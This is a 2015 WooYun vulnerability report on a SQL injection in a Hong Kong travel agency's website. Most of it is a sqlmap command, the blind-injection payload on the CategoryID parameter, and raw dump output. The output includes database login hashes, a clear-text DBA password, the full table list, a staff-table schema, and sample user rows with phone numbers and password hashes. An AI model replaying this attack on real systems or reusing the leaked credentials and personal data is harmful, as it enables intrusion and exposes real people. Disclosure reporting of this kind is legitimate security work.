当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151557

漏洞标题:大航假期某處存在SQL插入攻擊(DBA權限/sa密碼泄露/350個表/1000多名用戶電話號碼及密碼泄露)(香港地區)

相关厂商:大航假期

漏洞作者: 路人甲

提交时间:2015-11-03 18:42

修复时间:2015-12-19 19:08

公开时间:2015-12-19 19:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

大航假期於2007年11月設立在深圳羅湖區,公司屬於(港資)企業常駐深圳代表處。公司目前擁有員工300人以上,主要承接“香港大航假期(旅行社)有限公司”的電話業務銷售及領隊導遊接團等相關的業務聯繫活動。“香港大航假期(旅行社)有限公司”在香港已有8間分行,分別位於:上環、旺角、屯門 、大埔、元朗、天水圍、上水、沙田,屬於香港較大的旅行社之一。
公司有健全的部門:導遊客服部、行程部、設計部、訂房部、包團部、財務部......
大航假期(旅行社)有限公司擁有一支充滿激情與活力、素質高、業務能力強的客服、領隊、導遊隊伍。公司始終堅持“服務至上,誠信第一”的宗旨。為顧客提供無窮無盡之「歡樂假期.奢華享受」,用超值的價錢,得到無價之歡樂。這不僅吸引了更多旅遊愛好者的密切注視,更深得消費者的信賴

详细说明:

地址:http://**.**.**.**/revamp/tour.php?CategoryID=3&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A

python sqlmap.py -u "http://**.**.**.**/revamp/tour.php?CategoryID=3&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A" -p CategoryID --technique=B --random-agent --batch --threads=10 -D BIG_LINE_TRAVEL -T USER_INFO -C ACCOUNT_NAME,USER_NAME,PASS_WORD,TEL_NO,ID,EMAIL,C_USER_NAME --dump


Database: BIG_LINE_TRAVEL
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| dbo.USER_INFO | 1566    |
+---------------+---------+

漏洞证明:

---
Parameter: CategoryID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CategoryID=3) AND 6122=6122 AND (8934=8934&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.3.13, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current user:    'mmmadmin'
current user is DBA:    True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CategoryID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CategoryID=3) AND 6122=6122 AND (8934=8934&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.3.13, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] mmmadmin
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100781d0a38ca6be044ed6d1c362e3333995f4ab12ecef85923
        header: 0x0100
        salt: 781d0a38
        mixedcase: ca6be044ed6d1c362e3333995f4ab12ecef85923
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100acdd5c74a900cbc62b2c070121acffa7f0fdc6f03323a818
        header: 0x0100
        salt: acdd5c74
        mixedcase: a900cbc62b2c070121acffa7f0fdc6f03323a818
[*] mmmadmin [1]:
    password hash: 0x01007b065d9fe566cf0081ccbe986a9383d306d2299654518ac2
        header: 0x0100
        salt: 7b065d9f
        mixedcase: e566cf0081ccbe986a9383d306d2299654518ac2
    clear-text password: mmm
[*] sa [1]:
    password hash: 0x01009116f995140e328928b8625a95d49100a3f864eee75b01fb
        header: 0x0100
        salt: 9116f995
        mixedcase: 140e328928b8625a95d49100a3f864eee75b01fb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CategoryID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CategoryID=3) AND 6122=6122 AND (8934=8934&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.3.13, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] BIG_LINE_TRAVEL
[*] BIG_LINE_TRAVEL_20150430
[*] BIG_LINE_TRAVEL_20150827
[*] BIG_LINE_TRAVEL_20150910
[*] BIG_LINE_WEB
[*] BIG_LINE_WEB2
[*] BIG_LINE_WEB_ORG
[*] master
[*] model
[*] msdb
[*] SINO_STEP_WEB
[*] tempdb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CategoryID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CategoryID=3) AND 6122=6122 AND (8934=8934&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.3.13, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CategoryID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CategoryID=3) AND 6122=6122 AND (8934=8934&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.3.13, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: BIG_LINE_TRAVEL
[350 tables]
+------------------------------------+
| ACCOUNT_CODE                       |
| AGENCY                             |
| APPS_INFO                          |
| ATTEND_DATE                        |
| ATTEND_RECORD                      |
| ATTEND_RECORD_REMARK               |
| BANK_INFO                          |
| BLACKLIST                          |
| BUS                                |
| CALENDAR                           |
| CANCEL_TICKET_REASON               |
| CANCEL_TOUR_REASON                 |
| CAR_NO_USAGE                       |
| CCODE                              |
| COMMON_SENTENCE                    |
| COMPANY                            |
| COMPLAIN_DETAIL                    |
| COMPLAIN_DETAIL_EDIT_HISTORY       |
| COMPLAIN_MASTER                    |
| COMPLAIN_MASTER_EDIT_HISTORY       |
| COUPON                             |
| COUPON_COMPANY                     |
| COUPON_DETAIL                      |
| COUPON_MASTER                      |
| CURRENCY                           |
| CURRENCY_RATE                      |
| CURRENT_LOGIN_LOG                  |
| DEPARTMENT                         |
| DISCOUNT                           |
| DISCOUNT_ITEM                      |
| DUTY_TYPE                          |
| EXP_BANK_INFO                      |
| EXP_BILL_TYPE                      |
| EXP_BREAKDOWN_DETAIL               |
| EXP_BREAKDOWN_MASTER               |
| EXP_BREAKDOWN_TOUR                 |
| EXP_CATEGORY                       |
| EXP_COMPANY                        |
| EXP_COMPANY_ACCOUNT                |
| EXP_PAYMENT                        |
| EXP_PAYMENT_FILE                   |
| EXP_SUPPLIER                       |
| EXP_SUPPLIER_ACCOUNT               |
| FAIL_ATTEMPT_LOG                   |
| FAQ                                |
| HC_CAR_NO                          |
| HC_COMMON_STATUS                   |
| HC_DEPOSIT_TYPE                    |
| HC_DISCOUNT_TYPE                   |
| HC_EDIT_TYPE                       |
| HC_GUIDE_BONUS_MODE                |
| HC_GUIDE_POST                      |
| HC_MEAL_TYPE                       |
| HC_PAYMENT_TERM                    |
| HC_PAY_TYPE                        |
| HC_PRICE_MODE                      |
| HC_PRICE_TYPE                      |
| HC_PRINT_TYPE                      |
| HC_RATING                          |
| HC_ROOM_TYPE                       |
| HC_SERVICE_CATEGORY                |
| HC_SERVICE_CATEGORY_DETAIL         |
| HC_SERVICE_CATEGORY_TYPE           |
| HC_SERVICE_TYPE                    |
| HC_TEMPLATE_TYPE                   |
| HC_TOUR_BONUS_RATE                 |
| HC_TOUR_CODE_PREFIX                |
| HC_TOUR_STATUS                     |
| HC_TOUR_TYPE_2                     |
| HOTEL_COUNTRY                      |
| HOTEL_DETAIL                       |
| HOTEL_DISTRICT                     |
| HOTEL_INFO                         |
| HOTEL_MASTER                       |
| HOTEL_PRICE                        |
| HOTEL_PRICE_HISTORY                |
| HOTEL_RATING                       |
| HOTEL_TRANS                        |
| IDPOOL                             |
| ITEM                               |
| ITEM_COUPON                        |
| ITEM_COUPON_MASTER                 |
| ITEM_TYPE                          |
| LOGIN_LOG                          |
| MEMBER                             |
| MEMBER_DELETED                     |
| MEMBER_FEE                         |
| MEMBER_POINT_TRANS                 |
| MEMBER_POINT_TRANS_HISTORY         |
| MEMBER_REWARD                      |
| MEMBER_TEMP                        |
| MESSAGE_MASTER                     |
| MESSAGE_SEND                       |
| MISC_COUPON                        |
| MISC_CUSTOMER                      |
| MISC_DEPOSIT_HISTORY               |
| MISC_EXCHANGE_ORDER                |
| MISC_EXCHANGE_ORDER_PAYMENT        |
| MISC_FERRY_PRICE_TYPE              |
| MISC_FERRY_SCHEDULE                |
| MISC_INSURANCE_RATE                |
| MISC_ITEM_COUPON                   |
| MISC_PAYMENT                       |
| MISC_PRINT_HISTORY                 |
| MISC_SUPPLIER                      |
| MISC_TOUR                          |
| MISC_TRANS                         |
| OK_DEPOSIT_VIEW                    |
| OK_TRANS_HISTORY                   |
| OPTIONAL_ITEM                      |
| OP_GROUP                           |
| PAGE_TEMPLATE                      |
| PAY_METHOD                         |
| PICKING_POINT                      |
| QUESTION                           |
| QUESTION_ANSWER                    |
| QUESTION_EXAM                      |
| QUESTION_EXAM_INFO                 |
| RM_HOLIDAY                         |
| RPT_FOR_TOUR                       |
| SEAT_DETAIL                        |
| SEAT_MASTER                        |
| SHOP                               |
| SHOP_BALANCE_DETAIL                |
| SHOP_BALANCE_HISTORY               |
| SHOP_BALANCE_MASTER                |
| SHOP_IPADDRESS                     |
| SHOP_LOAN_RECORD                   |
| SHOP_TARGET_POINT                  |
| SMS                                |
| SMS_EDIT_HISTORY                   |
| SMS_EO                             |
| SMS_PROMOTE                        |
| SMS_UNSEND_PHONE_LIST              |
| STATIONARY                         |
| STATIONARY_DETAIL                  |
| STATIONARY_MASTER                  |
| TARGET_POINT                       |
| TICKET_BONUS_POINT                 |
| TICKET_COUPON                      |
| TICKET_DEPOSIT_HISTORY             |
| TICKET_DETAIL                      |
| TICKET_DETAIL_VIEW                 |
| TICKET_DISCOUNT                    |
| TICKET_EDIT_HISTORY                |
| TICKET_GROUP_BUY_COUPON            |
| TICKET_HOLD                        |
| TICKET_INSURANCE_DETAIL            |
| TICKET_INSURANCE_MASTER            |
| TICKET_INSURANCE_OTHER             |
| TICKET_MASTER                      |
| TICKET_OPTIONAL_ITEM               |
| TICKET_OVER_PAID                   |
| TICKET_PASSPORT                    |
| TICKET_PAYMENT                     |
| TICKET_PAYMENT_PRINT               |
| TICKET_PHONE_LIST                  |
| TICKET_PRINT_HISTORY               |
| TICKET_ROOM_TYPE                   |
| TICKET_STAMP                       |
| TICKET_SURVEY                      |
| TMP_OK_TRANS                       |
| TMP_STAFF_DAILY_SALES              |
| TMP_STAFF_MONTH_SALES              |
| TOUR                               |
| TOUR_BONUS_DETAIL                  |
| TOUR_BONUS_MASTER                  |
| TOUR_BONUS_PAYMENT                 |
| TOUR_BONUS_RATE                    |
| TOUR_BUS                           |
| TOUR_DESCRIPTION                   |
| TOUR_DISCOUNT                      |
| TOUR_DRIVER                        |
| TOUR_EDIT_HISTORY                  |
| TOUR_EDIT_LOG                      |
| TOUR_EO_DETAIL                     |
| TOUR_EO_MASTER                     |
| TOUR_EO_PAYMENT                    |
| TOUR_EO_PRINT                      |
| TOUR_EO_TOUR                       |
| TOUR_EXPENSE                       |
| TOUR_EXPENSE_EDIT_HISTORY          |
| TOUR_EXPENSE_HISTORY               |
| TOUR_EXPENSE_USAGE                 |
| TOUR_EXPENSE_USAGE_LOG             |
| TOUR_FLIGHT_INFO                   |
| TOUR_GUIDE_COMMENT                 |
| TOUR_GUIDE_LOG                     |
| TOUR_GUIDE_PAYMENT                 |
| TOUR_GUIDE_PENALTY                 |
| TOUR_HOTEL                         |
| TOUR_MISC_CHARGE_BREADOWN          |
| TOUR_OPTIONAL_ITEM                 |
| TOUR_OTHER_INFO                    |
| TOUR_PICKING_POINT                 |
| TOUR_POST_PAYMENT                  |
| TOUR_POST_PAYMENT_DETAIL           |
| TOUR_POST_PAYMENT_MASTER           |
| TOUR_PREPAYMENT                    |
| TOUR_PREPAYMENT_DETAIL             |
| TOUR_PREPAYMENT_FILE               |
| TOUR_PREPAYMENT_MASTER             |
| TOUR_PREPAYMENT_PAYMENT            |
| TOUR_PROFIT_SUMMARY                |
| TOUR_QUOTE                         |
| TOUR_QUOTE_DETAIL                  |
| TOUR_QUOTE_MASTER                  |
| TOUR_QUOTE_OPTION                  |
| TOUR_QUOTE_PAGE_TEMPLATE           |
| TOUR_QUOTE_PAYMENT                 |
| TOUR_QUOTE_TOUR                    |
| TOUR_REPORT_EXPENSE_LOG            |
| TOUR_ROOM_TYPE                     |
| TOUR_SEAT                          |
| TOUR_SEAT_VIEW                     |
| TOUR_SERVICE                       |
| TOUR_SERVICE_REGION                |
| TOUR_STAFF                         |
| TOUR_STATEMENT_DETAIL              |
| TOUR_STATEMENT_MASTER              |
| TOUR_STATEMENT_PAYMENT             |
| TOUR_STATEMENT_PRINT               |
| TOUR_STATUS                        |
| TOUR_SURVEY                        |
| TOUR_TEMPLATE                      |
| TOUR_TEMPLATE_ADS_CATEGORY         |
| TOUR_TEMPLATE_AGENCY               |
| TOUR_TEMPLATE_BONUS_MODE           |
| TOUR_TEMPLATE_BONUS_RATE           |
| TOUR_TEMPLATE_CATEGORY             |
| TOUR_TEMPLATE_DISCOUNT             |
| TOUR_TEMPLATE_EDIT_HISTORY         |
| TOUR_TEMPLATE_FILE                 |
| TOUR_TEMPLATE_HOTEL                |
| TOUR_TEMPLATE_OPTIONAL_ITEM        |
| TOUR_TEMPLATE_PACKAGE_PRICE        |
| TOUR_TEMPLATE_PATH                 |
| TOUR_TEMPLATE_PICKING_POINT        |
| TOUR_TEMPLATE_PRICE                |
| TOUR_TEMPLATE_PRICE_MODE           |
| TOUR_TEMPLATE_PROMOTE              |
| TOUR_TEMPLATE_PROMOTE_HISTORY      |
| TOUR_TEMPLATE_ROOM_TYPE            |
| TOUR_TEMPLATE_SERVICE              |
| TOUR_TEMPLATE_SERVICE_DISTRICT     |
| TOUR_TEMPLATE_SERVICE_REGION       |
| TOUR_TEMPLATE_SERVICE_TYPE         |
| TOUR_TEMPLATE_SUPPLIER             |
| TOUR_TEMPLATE_UPDATE_HISTORY       |
| TOUR_TERMS                         |
| T_ADS_CATEGORY                     |
| T_CATEGORY                         |
| T_COUNTRY                          |
| T_CUSTOMER                         |
| T_DISCOUNT                         |
| T_DISTRICT                         |
| T_DRIVER                           |
| T_DRIVER_BLACKLIST                 |
| T_ESCORT                           |
| T_ESCORT_DISTRICT                  |
| T_ESCORT_WORK_HISTORY              |
| T_GUIDE                            |
| T_GUIDE_DISTRICT                   |
| T_GUIDE_PENALTY                    |
| T_GUIDE_POST_HISTORY               |
| T_GUIDE_WORK_HISTORY               |
| T_INSURANCE                        |
| T_INSURANCE_COUNTRY                |
| T_MISC_ITEM                        |
| T_PASSPORT                         |
| T_PASSPORT_COUNTRY                 |
| T_PROMOTE_TYPE                     |
| T_PROVINCE                         |
| T_REGION                           |
| T_REGION_DISTRICT                  |
| T_SERIES                           |
| T_SERVICE                          |
| T_SERVICE_DISTRICT                 |
| T_SERVICE_EDIT_HISTORY             |
| T_SERVICE_INCLUDE                  |
| T_SERVICE_PRICE                    |
| T_SERVICE_REGION                   |
| T_SPECIAL                          |
| T_SPECIAL_EDIT_HISTORY             |
| T_SUPPLIER                         |
| T_SUPPLIER_BOOK                    |
| T_SUPPLIER_CONTACT                 |
| T_SUPPLIER_DEFAULT_PRICE_TYPE      |
| T_SUPPLIER_DEPOSIT                 |
| T_SUPPLIER_DEPOSIT_USAGE           |
| T_SUPPLIER_DISCOUNT                |
| T_SUPPLIER_DISCOUNT_BREAKDOWN      |
| T_SUPPLIER_DISCOUNT_COMPLETED_DATE |
| T_SUPPLIER_DISCOUNT_DETAIL         |
| T_SUPPLIER_DISCOUNT_MEAL_TYPE      |
| T_SUPPLIER_DISCOUNT_OLD            |
| T_SUPPLIER_EDIT_HISTORY            |
| T_SUPPLIER_FILE                    |
| T_SUPPLIER_PRICE                   |
| T_SUPPLIER_PRICE_EDIT_HISTORY      |
| T_SUPPLIER_PRICE_TEMP              |
| T_SUPPLIER_PRICE_TYPE              |
| T_SUPPLIER_PRICE_TYPE_EDIT_HISTORY |
| T_SUPPLIER_PROMOTE                 |
| T_SUPPLIER_PROMOTE_CATEGORY        |
| T_SUPPLIER_PROMOTE_DETAIL          |
| T_SUPPLIER_PROMOTE_PRICE_TYPE      |
| T_SUPPLIER_PROMOTE_USAGE           |
| T_SUPPLIER_RATIO                   |
| T_SUPPLIER_REGION                  |
| T_SUPPLIER_REMARK                  |
| T_SUPPLIER_SERIES                  |
| T_SUPPLIER_SERVICE                 |
| T_SUPPLIER_SPECIAL                 |
| T_VISA                             |
| USER_ACCESS_RIGHT                  |
| USER_COMMISSION_RATE               |
| USER_DUTY                          |
| USER_DUTY_TEMP                     |
| USER_DUTY_TEMP_VIEW                |
| USER_EDIT_HISTORY                  |
| USER_INFO                          |
| USER_MONTHLY_ALLOWANCE             |
| USER_MONTHLY_SALARY                |
| USER_MONTHLY_SALARY_HISTORY        |
| USER_SALARY                        |
| USER_SALARY_HISTORY                |
| USER_STATUS_LOG                    |
| USER_TARGET_POINT                  |
| WEB_FERRY_DETAIL                   |
| WEB_FERRY_MASTER                   |
| WEB_FERRY_PAYMENT                  |
| WEB_FERRY_REMARK                   |
| WEB_TICKET_DETAIL                  |
| WEB_TICKET_DETAIL_1                |
| WEB_TICKET_DETAIL_2                |
| WEB_TICKET_MASTER                  |
| WEB_TICKET_MASTER_1                |
| WEB_TICKET_MASTER_2                |
| WEB_TICKET_PAYMENT                 |
| WEB_TICKET_PAYMENT_1               |
| WEB_TICKET_PAYMENT_2               |
| WEB_TICKET_REMARK                  |
| WEB_TICKET_REMARK_1                |
| WEB_TICKET_REMARK_2                |
| WEB_TOUR_DATE                      |
| _COMMON_STATUS                     |
| _MESSAGE                           |
| _SYSTEM_CONFIG                     |
| _USER_GROUP                        |
+------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CategoryID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CategoryID=3) AND 6122=6122 AND (8934=8934&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: PHP 5.3.13, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: BIG_LINE_TRAVEL
Table: USER_INFO
[54 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| ACCOUNT_NAME         | nvarchar |
| ACCOUNT_NO           | nvarchar |
| ADDRESS              | nvarchar |
| AGENCY_ID            | int      |
| BANK_DISTRICT        | nvarchar |
| BANK_NAME            | nvarchar |
| BANK_PROVINCE        | nvarchar |
| BRANCH_NAME          | nvarchar |
| C_USER_NAME          | nvarchar |
| COMMISSION_TYPE      | int      |
| COMPANY_ID           | int      |
| CREATE_DATE          | char     |
| DEPARTMENT_ID        | int      |
| EDIT_USER_ACCOUNT    | int      |
| EMAIL                | varchar  |
| EMERGENCY_NAME_1     | nvarchar |
| EMERGENCY_NAME_2     | nvarchar |
| EMERGENCY_NAME_3     | nvarchar |
| EMERGENCY_RELATION_1 | nvarchar |
| EMERGENCY_RELATION_2 | nvarchar |
| EMERGENCY_RELATION_3 | nvarchar |
| EMERGENCY_TEL_1      | nvarchar |
| EMERGENCY_TEL_2      | nvarchar |
| EMERGENCY_TEL_3      | nvarchar |
| GROUP_ID             | int      |
| HOLIDAY_LEFT         | int      |
| ID                   | int      |
| IDNO                 | nvarchar |
| IS_COMMISSION        | int      |
| IS_GUIDE_ESCORT      | int      |
| IS_OWN_STAFF         | int      |
| IS_SALARY            | int      |
| IS_TARGET_PT         | int      |
| JOIN_DATE            | varchar  |
| LAST_LOGIN_STATUS    | varchar  |
| LAST_LOGIN_TIME      | varchar  |
| LEAVE_DATE           | varchar  |
| LOCATION_ID          | int      |
| LOGIN_ID             | varchar  |
| OP_GROUP_ID          | int      |
| PACKAGE_PREFIX       | varchar  |
| PASS_WORD            | varchar  |
| POST_ID              | int      |
| REMARK               | nvarchar |
| SHOP_ID              | int      |
| STAFF_NO             | varchar  |
| STATUS               | int      |
| SUPPLIER_ID          | int      |
| TEL_NO               | varchar  |
| TEL_NO_2             | varchar  |
| UPDATE_DATE          | char     |
| USER_NAME            | nvarchar |
| VIEW_MGMT_REPORT     | int      |
| VIEW_PROFIT          | int      |
+----------------------+----------+


Database: BIG_LINE_TRAVEL
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| dbo.USER_INFO | 1566    |
+---------------+---------+


这里展示部分用户密码即可

Table: USER_INFO
[8 entries]
+--------------+-----------+-----------------------------------+----------------+------+-------+-------------+
| ACCOUNT_NAME | USER_NAME | PASS_WORD                         | TEL_NO         | ID   | EMAIL | C_USER_NAME |
+--------------+-----------+-----------------------------------+----------------+------+-------+-------------+
| <blank>      | ꅻٴ       | 0D1F4DDA68EE3636FA633E542E617EB38 | 65366221       | 1    | <blank> | ꅻٴ         |
| <blank>      | <blank>   | <blank>                           | <blank>        | -1   | <blank> | <blank>     |
| <blank>      | 螀癡❙⪂-媋㵾   | 02FB0DA083C31AA713065C9CD9A7E5FC8 | <blank>        | 10   | <blank> | 螀癡❙⪂-媋㵾     |
| TAM WAI YIN  | ࢊ뾊-媋条    | 28E88A5F20760827D515C4EBF5B06E2A8 | 92039771       | 100  | <blank> | ࢊ뾊-媋条      |
| <blank>      | 玖ή        | E10ADC3949BA59ABBE56E057F20F883E8 | 13543842814    | 1000 | <blank> | 玖ή          |
| <blank>      | 蕿䡑ή       | E10ADC3949BA59ABBE56E057F20F883E8 | 13823967813    | 1001 | <blank> | ⥙늏誃        |
| <blank>      | ⺖ƀ罧       | E10                               | 0760-88262228  | 1002 | <blank> | ⵎ煜끥襛칗       |
| <blank>      | <blank>   | E10ADC3949BA59ABBE56E057F20F881E1 | 0757-2929 8809 | 1003 | <blank> | <blank>     |
+--------------+-----------+-----------------------------------+----------------+------+-------+-------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-04 19:06

厂商回复:

已將事件通知有關機構

最新状态:

暂无

漏洞评价:

评价